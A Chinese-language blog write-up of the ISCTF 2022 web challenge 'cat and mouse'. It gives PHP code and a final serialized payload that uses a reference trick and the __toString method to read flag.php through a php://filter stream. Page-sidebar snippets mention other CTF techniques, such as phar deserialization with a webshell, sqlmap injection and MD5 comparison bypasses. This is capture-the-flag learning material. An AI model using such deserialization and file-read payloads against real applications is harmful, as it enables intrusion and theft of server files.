记录2022-ISCTF有意思的题目

最新推荐文章于 2023-02-09 23:16:18 发布
最新推荐文章于 2023-02-09 23:16:18 发布
阅读量426 收藏 1
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58543272/article/details/127700290
版权

猫和老鼠

 当时不会的点在于cat类的$a不会给他重新赋值,看到一个大佬的思路这里重新整理一下

首先mouse类有个__tostring方法,里面有个包含,可以想到文件包含。只要能调用这个类就可以利用了。

cat的$a被写死了,因此要想怎么给他绕过指向dog类的限制

payload:

<?php

class mouse
{
    public $v;

    public function __construct()
    {
        $this->v = 'php://filter/convert.base64-encode/resource=flag.php';
    }

}


class cat
{
    public $a;
    public $b;
    public $c;
    public function __construct()
    {
        $this->b = &$this->a;
        $this->c = new mouse();
    }
}

$abc = new cat();
echo serialize($abc);

        大佬的payload,整理在mouse类和cat类重新给变量赋值了,mouse里面用了个php://伪协议流读flag,cat里面的b变量指向a的空间地址,也就是b变成了一个指针变量,此时给b赋值就是给a赋值,重新把a原本的dog类覆盖了。然后c赋值为mouse类(tql!!!)最终用die()输出a,die()和echo一样输出字符串,这样子就触发mouse类中的__tostring魔术方法。完美!

        反思:没想到用指针变量赋值,payload也不会写得这么好。

最终payload:

O:3:"cat":3:{s:1:"a";N;s:1:"b";R:2;s:1:"c";O:5:"mouse":1:{s:1:"v";s:52:"php://filter/convert.base64-encode/resource=flag.php";}}

小学生二年级
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越容易遭受攻击,遭受攻击的后果越严重。“网络安全和信息化是一体之两翼、驱动之双轮。没有网络安全就没有国家安全。”信息是社会发展的重要战略资源,国际上围绕信息的获取、使用和控制的斗争愈演愈烈,信息安全保障能力是综合国力、经济竞争实力和生存能力的重要组成部分,是世纪之交世界各国奋力攀登的至高点。 信息安全与对抗技术竞赛(ISCC:Information Security and Countermeasures Contest),于2004年首次举办(国内第一),2022年大学生竞赛为第19届,中小学生信息安全对抗赛为第11届,河南赛区为第10届,广西赛区为第9届,研究生赛为第5届,累计参赛人数7.2万人次以上,近年来参赛院校1000多所,影响广泛且深远。
2022 ISCTF《MD5脏了》
qq_45332357的博客
10-30 406
2022 ISCTF《MD5脏了》
ISCTF2022 web wp
m0_60743498的博客
11-24 1074
先传入your name进入下一个判断 P0ST1不等于P0ST2,但是P0ST1等于P0ST2的md5值,这是md5的弱碰撞 GET1过滤了纯数字,用字母绕过,GET2大于678,不能为数字,数组绕过 构造payload: GET: [http://120.79.18.34:20120/?NAME=111&P0ST1=0&P0ST2=s1502113478a](http://120.79.18.34:20120/?NAME=111&P0ST1=0&P0ST2=s1502113478a)
ISCTF2022部分wp
m0_73952121的博客
11-07 917
ISCTF2022部分wp
ISCTF2022部分WP
y2xsec的博客
11-04 2318
ISCTF2022部分WP
ISCTF2021-WriteUp.pdf
10-24
isctf的详细wp
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
ISCTF2022补充
starttv的博客
11-08 331
分析代码发现存在file_exit()函数并且可以上传文件,想到phar反序列化。上传一个带有一句话木马的jpg图片,再利用文件包含。用dirsearch工具扫描目录发现www.rar。尝试上传文件发现出了jpg图片,别的都不让上传。分析源码发现存在文件包含。源码index.php
ISCTF PWN WP 2022
GeekCmore的博客
11-07 1432
ISCTF PWN 部分题解 WP
ISCTF2022 WEB题解
qq2642343642的博客
02-09 432
ISCTF2022的web题解
SHELL CTF 2022题目及wp
Laffrey的专栏
08-16 383
https://gitcode.net/rickliuxiao/shellctf2022 SHELLCTF2022 真题及wp。
2022天工杯CTF---crypto1 wp
3tefanie丶zhou的博客
07-20 1249
【大概世间有一种自讨苦吃,叫做设身处地,处处为他人着想。】
ISCTF Writes Up
weixin_56678592的博客
10-23 2475
ISCTF 2021 Writes Up Crypto部分: 弯弯曲曲的路 附件: }I_cFTle_FToneCSWnTC5@0{I 题目叫弯弯曲曲的路,很明显曲路密码,提示说了行与列都是5。 exp: import re def encrypt_bend(string, col, row=10): ciphertext = "" temp = [] for i in range(col): temp.append([]) for index, i
实验吧ctf web题老鼠
ZweLL032的博客
03-16 2664
解题链接: http://ctf5.shiyanbar.com/basic/catch/ 首先点进去然后题目都提醒了catch catch 所以应该包首先随便提交0000进去 看到的结果是这个然后用Burpsuite包然后发送到repeater首先看response回应 肯定是那个 好然后把它的值粘贴复制到pass_key得到这个结果此题的解题方法就是这样
实验吧-老鼠 Writeup
baynk的博客
08-31 685
应该是8月最后一篇。。。 过程 链接:http://ctf5.shiyanbar.com/basic/catch/ 这个还是很简单的,而且之前有个题和这个很像,做的很快。 进入就是提交一个参数,随便写了些东西,没发现明显注入,丢入burpsuite中看。 发现有明显的非常规http头部信息,还是base64加密的,解密后是一串数字,然后提交后仍然数字,感觉像是时间戳。。。 还是失败了,可能是手速...
ISCTF新生赛 Web easy_sql题解(sqlmap的基操)
Landasika的博客
10-27 1454
先观察题目的提示,(由于是新生赛,所以提示比较明显)显然是需要我们用SQLMAP进行操作。 不妨输入 用户名 1 密码 1' or '1'='1 来进行简单的测试,果然登陆上了。但是返回的是“登陆成功”并没有返回数据库中的内容,于是也可以尝试尝试sql盲注的思路。 一、sqlmap解法 sqlmap的基本命令:Kali Linux 漏洞利用工具集 sqlmap 教程 - 付杰博客 某大神的sqlmap学习笔记:Kali Linux学习笔记—SQLMAP 自动注入_江河湖...
CTF---Web入门第七题 老鼠
weixin_34214500的博客
11-08 308
老鼠分值:10 来源: 实验吧 难度:难 参与人数:8697人 Get Flag:3740人 答题人数:3944人 解题通过率:95% catch!catch!catch!嘿嘿,不多说了,再说剧透了 解题链接: http://ctf5.shiyanbar.com/basic/catch/ 原题链接:http://www.shiyanbar.com/c...
CTF 老鼠
zero
08-04 1300
catch!catch!catch!嘿嘿,不多说了,再说剧透了 解题链接: http://ctf5.shiyanbar.com/basic/catch/ 打开 随便输入一段字符 根据题目提示进行包 打开浏览器菜单,按下快捷键f12进入web控制台 在弹出的web控制台中,选择到“网络” 点击“重新载入”,或者按下快捷键F5,刷新网页就能取网页上的内容 接下来,选...
老鼠--实验吧
Gunther的博客
09-01 2550
老鼠 叫内容一排/瞎闹
import gmpy2 import libnum from crypto.Util.number import * flag=b'ISCTF{*************}' m=bytes_to_long(flag)
最新发布
11-24
根据提供的引用内容,代码中使用了`bytes_to_long()`函数将字节串转换为整数类型,该函数来自于`Crypto.Util.number`模块。同时,代码中还使用了`gmpy2`和`libnum`模块,这两个模块分别提供了高精度计算和数字转换的功能。因此,为了使代码正常运行,需要先安装这些模块。 以下是代码示例: ```python import gmpy2 import libnum from Crypto.Util.number import * flag = b'ISCTF{*************}' m = bytes_to_long(flag) # 使用gmpy2模块进行高精度计算 p = gmpy2.next_prime(m) q = gmpy2.next_prime(p) n = p * q # 使用libnum模块进行数字转换 e = libnum.invmod(65537, (p-1)*(q-1)) c = pow(m, e, n) print("p =", p) print("q =", q) print("n =", n) print("e =", e) print("c =", c) ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值